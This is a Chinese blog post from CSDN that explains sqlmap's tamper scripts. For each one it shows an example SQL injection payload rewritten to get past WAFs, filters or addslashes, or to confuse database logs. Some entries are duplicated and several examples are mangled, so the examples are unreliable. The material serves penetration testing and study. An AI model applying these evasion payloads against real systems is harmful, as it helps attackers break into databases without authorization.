SQLMap中tamper篡改脚本的功能解释

最新推荐文章于 2024-05-01 12:30:53 发布
最新推荐文章于 2024-05-01 12:30:53 发布
阅读量561 收藏
点赞数
分类专栏: study 文章标签: sqlmap tamper
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40775742/article/details/103356963
版权 
apostrophemask.py

功能:对引号进行utf-8格式编码(%EF%BC%87)

平台:All

举例:1 AND ‘1’='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

apostrophenullencode.py

功能:用非法的双unicode字符(%00%27)替换引号字符

平台:All

举例:1 AND ‘1’='1 ==> 1 AND %00%271%00%27=%00%271

appendnullbyte.py

功能:在有效载荷结束位置加载零字节字符编码

平台:Microsoft Access

举例:1 AND 1=1 ==> 1 AND 1=1%00

base64encode.py

功能:用base64格式进行编码

平台:All

举例:1’ AND SLEEP(5)# > MScgQU5EIFNMRUVQKDUpIw

between.py

功能:用between替换大于号(>)

平台:Mssql2005、MySQL 4/5.0/5.5、Oracle 10g、PostgreSQL 8.3/8.4/9.0

举例:

1 AND A > B –  ==> 1 AND A NOT BETWEEN 0 AND B  –

1 AND A = B –  ==> 1 AND A BETWEEN B AND B –

bluecoat.py

功能:对SQL语句替换空格字符为(%09),并替换"="—>“LIKE”

平台:MySQL 5.1, SGOS

举例:SELECT username FROM users WHERE id = 1 ==> SELECT%09username FROM%09users WHERE%09id LIKE 1

apostrophemask.py

功能:用utf-8格式编码引号(如:%EF%BC%87)

平台:All

举例:1 AND ‘1’='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

charunicodeencode.py

功能:对字符串进行Unicode格式转义编码

平台:Mssql 2000,2005、MySQL 5.1.56、PostgreSQL 9.0.3 ASP/ASP.NET

举例:SELECT FIELD%20FROM TABLE ==> %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

charencode.py

功能:采用url格式编码1次

平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

举例:SELECT FIELD FROM%20TABLE ==> %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

chardoubleencode.py

功能:采用url格式编码2次

平台:All

举例:SELECT FIELD FROM%20TABLE ==> %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

commalessmid.py

功能:将payload中的逗号用 from和for代替,用于过滤了逗号并且是3个参数的情况

平台:MySQL 5.0, 5.5

举例:MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1)

concat2concatws.py

功能:CONCAT() ==> CONCAT_WS(),用于过滤了CONCAT()函数的情况

平台: MySQL 5.0

举例:CONCAT(1,2) ==> CONCAT_WS(MID(CHAR(0),0,0),1,2)

equaltolike.py

功能:= ==> LIKE,用于过滤了等号"="的情况

平台:Mssql 2005、MySQL 4, 5.0 and 5.5

举例:SELECT * FROM users WHERE id=1 ==> SELECT * FROM users WHERE id LIKE 1

greatest.py

功能:> ==> GREATEST

平台:MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

举例:1 AND A > B ==> 1 AND GREATEST(A, B+1)=A

a和b+1比较,取两者中的最大值为a;则a >= b+1,亦即a > b

halfversionedmorekeywords.py

功能:空格 ==> /*!0 (在关键字前添加注释)

平台:MySQL 4.0.18, 5.0.22(Mysql < 5.1)

举例:union ==> /*!0union

ifnull2ifisnull.py

功能:IFNULL(A, B) ==> IF(ISNULL(A), B, A)

平台:MySQL 5.0 and 5.5

举例:IFNULL(1, 2) ==> IF(ISNULL(1),2,1)

informationschemacomment.py

功能:

在 information_schema 后面加上 /**/ ,用于绕过对 information_schema 的情况

retVal = re.sub(r"(?i)(information_schema).", “g<1>/**/.”, payload)

平台:All

举例:select table_name from information_schema.tables ==> select table_name from information_schema/**/.tables

lowercase.py

功能:将 payload 里的大写转为小写

平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

举例:SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> select table_name from information_schema.tables

modsecurityversioned.py

功能:用注释来包围完整的查询语句,用于绕过 ModSecurity 开源 waf

平台:MySQL 5.0

举例:1 AND 2>1--  ==> 1 /!30874AND 2>1/–

modsecurityzeroversioned.py

功能:用注释来包围完整的查询语句,用于绕过 waf ,和上面类似

平台:Mysql

举例:1 and 2>1–+ ==> 1 /!00000and 2>1/–+

multiplespaces.py

功能:围绕SQL关键字添加多个空格

平台:All

举例:1 UNION SELECT foobar ==> 1 UNION SELECT foobar

nonrecursivereplacement.py

功能:关键字双写,可用于关键字过滤

平台:All

举例:1 UNION SELECT 2--  ==> 1 UNIONUNION SELESELECTCT 2–

overlongutf8.py

功能: 转换给定的payload当中的所有字符

平台:All

举例:SELECT FIELD FROM TABLE WHERE 2>1 ==> SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1

percentage.py

功能:用百分号来绕过关键字过滤,在关键字的每个字母前面都加一个(%)

平台:Mssql 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0

举例:SELECT FIELD FROM TABLE ==> %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

randomcase.py

功能:将 payload 随机大小写

平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

举例:INSERT ==> InseRt

randomcomments.py

功能:在 payload 的关键字中间随机插入注释符 /**/ ,可用于绕过关键字过滤

平台:Mysql

举例:INSERT ==> I / ** / N / ** / SERT

securesphere.py

功能:在payload后追加特殊构造的字符串

平台:All

举例:1 AND 1=1 ==> 1 AND 1=1 and ‘0having’=‘0having’

space2comment.py

功能:用注释符 // 代替空格,用于空格的绕过

平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

举例:SELECT id FROM users ==> SELECT//id//FROM//users

space2dash.py

功能:用[注释符(–)+一个随机字符串+一个换行符]替换控制符

平台:MSSQL、 SQLite

举例:union select 1,2–+ ==> union–HSHjsJh%0Aselect–HhjHSJ%0A1,2–+

space2hash.py

功能:用[注释符(#)+一个随机字符串+一个换行符]替换控制符

平台:Mysql

举例:union select 1,2–+ ==> union%23HSHjsJh%0Aselect%23HhjHSJ%0A1,2–+

space2morehash.py

功能:用多个[注释符(#)+一个随机字符串+一个换行符]替换控制符

平台:MySQL >= 5.1.13

举例:union select 1,2–+ ==> union %23 HSHjsJh %0A select %23 HhjHSJ %0A%23 HJHJhj %0A 1,2–+

space2mssqlblank.py

功能:用随机的空白符替换payload中的空格

blanks = (’%01’, ‘%02’, ‘%03’, ‘%04’, ‘%05’, ‘%06’, ‘%07’, ‘%08’, ‘%09’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0E’, ‘%0F’, ‘%0A’)

平台:Mssql 2000,2005

举例:SELECT id FROM users ==> SELECT%0Eid%0DFROM%07users

space2mssqlhash.py

功能:用[字符# +一个换行符]替换payload中的空格

平台:MSSQL、MySQL

举例:union select 1,2–+ ==> union%23%0Aselect%23%0A1,2–+

space2plus.py

功能:用加号(+)替换空格

平台:All

举例:SELECT id FROM users ==> SELECT+id+FROM+users

space2randomblank.py

功能:用随机的空白符替换payload中的空格

平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

举例:SELECT id FROM users ==> SELECT%0Did%0DFROM%0Ausers

sp_password.py

功能:在payload语句后添加 sp_password ,用于迷惑数据库日志(Space ==> sp_password)

平台:Mssql

举例:1 AND 9227=9227--  ==> 1 AND 9227=9227 – sp_password

symboliclogical.py

功能:用 && 替换 and ,用 || 替换 or ,用于这些关键字被过滤的情况

平台:All

举例:

1 and 1=1 ==> 1 %26%26 1=1

1 or 1=1 ==> 1 %7c%7c 1=1

unionalltounion.py

功能:用 union select 替换union all select

平台:All

举例:union all select 1,2–+ ==> union select 1,2–+

unmagicquotes.py

功能:用宽字符绕过 GPC addslashes

平台:All

举例:1’ and 1=1 ==> 1%df%27 and 1=1–

uppercase.py

功能:将payload中的小写字母转为大写格式

平台:Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

举例:insert ==> INSERT

varnish.py

功能:添加一个HTTP头“ X-originating-IP ”来绕过WAF

平台:headers = kwargs.get(“headers”, {})headers[“X-originating-IP”] = "127.0.0.1"return payload

举例:All

versionedkeywords.py

功能:对非函数的关键字进行注释

平台:MySQL 4.0.18, 5.1.56, 5.5.11

举例:1 union select user() ==> 1/!UNION//!SELECT/user()

versionedmorekeywords.py

功能:对每个关键字进行注释处理

平台:MySQL 5.1.56, 5.5.11

举例:1 union select user() ==> 1/!UNION//!SELECT/user()

xforwardedfor.py

功能:添加一个伪造的HTTP头“ X-Forwarded-For ”来绕过WAF

平台:All

举例:headers = kwargs.get(“headers”, {})headers[“X-Forwarded-For”] = randomIP()return payload

jbsfkjskj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLMAP工具详解
zxq850107005的博客
10-13 1635
sqlmap 支持的注入模式: ​ 基于布尔的盲注:根据返回的页面内容为条件判断真假的注入; ​ 基于时间的盲注:不能根据页面返回内容判断任何信息。用条件语句加入延时函数,通过页面的返回时间来判断; ​ 基于报错注入:利用页面会返回错误信息; ​ 联合查询注入:可以使用union的情况下的注入; ​ 堆查询注入:可以同时执行多条语句的注入。 支持的数据库:多种… 选项 1、输出等级 ​ -v:观察sqlmap对一个点进行了怎样的常识判断以及读取数据,默认是1 ​ 0(只显示python错误以及严重的信息
sqlmaptamper的用法
热门推荐
路虽远,行将至。事虽难,做必达。
03-09 1万+
sqlmap部分脚本用法说明 1、apostrophemask.py 适用数据库:ALL 作用:将引号替换为utf-8,用于过滤单引号 使用脚本前:tamper("1 AND '1'='1") 使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871 2、base64encode.py 适用数据库:ALL 作用:替换base64编码 使用脚本前:tamper("1' AND SLEEP(5)#") 使用脚本后:MScgQU5EIFNMRUVQKDUpIw==
sqlmap自带的tamper你了解多少?
hl1293348082的专栏
04-04 4507
sqlmap 是一款注入神器广为人知,里面的 tamper 常常用来绕过 WAF ,很实用的模块,但是却常常被新手忽略(比如我),今天就整理总结一下 tamper 的用法以及 tamper 的编写 PS:工具既然叫做工具,就是用来辅助上单的,呸辅助我们完成某些任务的,仅仅适用于当进行某些重复的繁琐工作或是偶尔懒癌发作时,不能过度依赖 ALL 表示所有数据库都适用,具体指出哪种数据库就表名只只适用于某些数据。 使用方法: sqlmap.py XXXXX -tamper "模块名" 各个 tamp
sqlmap常用tamper汇总及使用指导
Thunderclap的博客
02-15 1685
sqlmap常用tamper汇总及使用指导
sqlmaptamper脚本
L1ni01
11-14 3181
sqlmaptamper脚本 进行注入时,往往会遇到服务端主机装有 WAF(Web Application Firewall)对 Payload 进行过滤的情况,这使得注入攻击无法成功实施。但 WAF 往往是通过规则对攻击的 Payload 进行检测然后过滤,只要我们能绕过 WAF 的检测规则就能完成攻击。那么绕过的方法一般有哪些呢?我们可以透过 SQLMAP 的绕过技术学习一二。 SQLMAP 有一个 Tamper 模块专为绕过 WAF 制定特殊的 Payload,–-tamper选项可以使用加载模
sqlmap-tamper脚本分类
09-22
web渗透,sqlmap脚本分类。渗透
SQLMapTamper.docx
09-26
表示对指定的 url 地址,以所设置的 level 等级、risk 等级,并采用选定的 tamper 篡改脚本对参数“uname”进行检测。 tamper 脚本可以适配不同数据库类型的测试,例如 MySQL、MSSQL 等。不同的 tamper 脚本适用于...
总结一些SqlMap的常用tamper脚本释义.docx
02-02
SqlMap 是一个功能强大且广泛使用的 SQL 注入检测工具,它提供了多种 tamper 脚本来帮助用户绕过 Web 应用防火墙(WAF)和入侵检测系统(IDS),从而实现对网站漏洞的检测和利用。下面是常用的 SqlMap tamper 脚本...
sqlmap绕过过滤的 tamper 脚本分类汇总
03-17
sqlmap绕过过滤的 tamper 脚本分类汇总 sqlmap
sqlmap常用参数和脚本说明
野马菲比的博客
05-26 1238
常用参数: -u 指定目标URL --dbs 列出所有数据库 --current-db 列出当前数据库 --tables 列出当前表 --columns 列出当前列 -D 选择使用哪个数据库 -T 选择使用哪个数据表 -C 选择使用哪个列 --dump 获取字段的数据 --batch 自动选择yes --smart 启发式快速判断,节约时间 --tamper 调用脚本 -v 指定回显等级 --delay 设置多久可以访问一次,例如--delay 10
sqlmap (六) http参数设置
hpx12345678的博客
10-06 1117
1)目的在访问需要HTTP认证的网站的时候,需要进行用户密码认证,我们直接探测会导致401错误;想要不登陆的情况下探测这个站点可以设置忽略401从而绕过继续探测;2)参数。
sqlmap 常用 tamper 解释
吃个榴莲压压鲸的博客
03-23 2120
1.使用方法 sqlmap-u[url]--tamper[模块名] tamper存储在/usr/share/sqlmap/tamper下 2.脚本解释: apostrophemask.py 适用数据库:ALL 作用:将引号替换为utf-8,用于过滤单引号 使用脚本前:tamper("1 AND '1'='1") 使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871 base64encode.py 适用数据库:ALL 作用:替换为base64编...
sqlmap各个 tamper 的作用
烟敛寒林的博客
10-26 4492
各个 tamper 的作用   apostrophemask.py: return payload.replace(''', "%EF%BC%87") if payload else payload 将单引号 url 编码,用于过滤了单引号的情况。 1' AND '1'='1 to 1%EF%BC%87 AND %EF%BC%871%EF%BC%87=%EF%BC%871 适用...
网络安全渗透测试——名词解释
weixin_43778463的博客
10-12 3093
常用术语解释
sqlmap_--tamper使用技巧
qq_47053702的博客
01-27 1403
作用:将空格替换为有效字符集的随机空白字符(‘%01’, ‘%02’, ‘%03’, ‘%04’, ‘%05’, ‘%06’, ‘%07’, ‘%08’, ‘%09’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0E’, ‘%0F’, ‘%0A’)使用脚本后:%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45。使用脚本后:%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E。
Sqlmap Tamper 编写/改写 学习
Goodric的博客
04-26 1802
sqlmap的--tamper参数可以引入用户自定义的脚本修改注入时的payload ,达到sql注入时对一些敏感字符的一些绕过
9.二次编码注入
kinght的博客
08-26 799
title: 9.二次编码注入 date: 2020-08-21 23:55:00 categories: 4.网络安全 1.Web安全 1.SQL注入 tags: 1.Web安全 2.SQL注入 二次编码注入和宽字节注入有着异曲同工之妙,都是在面对PHP代码或者配置,对输入的‘(单引号)进行转义的时候,在处理用户输入的数据时存在问题,绕开了转义 二次编码注入原理 编码 为什么要进行编码 编码肯定是因为原始的格式并不适合传输才进行的,例如+,=,&,;等符号在http请求过程会与原有格式.
SQLMAP的使用
m0_58001548的博客
04-03 3753
SQLmap 是一款用来检测与利用 SQL 注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。官方网站下载 http://sqlmap.org/
SQL 注入神器:SQLMap 参数详解
最新发布
Flag少侠的博客
05-01 1959
这些选项可用于创建自定义用户定义函数--udf-inject 注入自定义用户定义函数--shared-lib=SHLIB 共享库的本地路径。
写一个sqlmaptamper模块的Python脚本
08-07
以上是一个简单的示例,tamper模块的具体使用方式和功能请参考SQLMap的官方文档以及tamper模块的其他脚本。 ### 回答3: 下面是一个简单的SQLMAPtamper模块的Python脚本示例: ```python #!/usr/bin/env ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值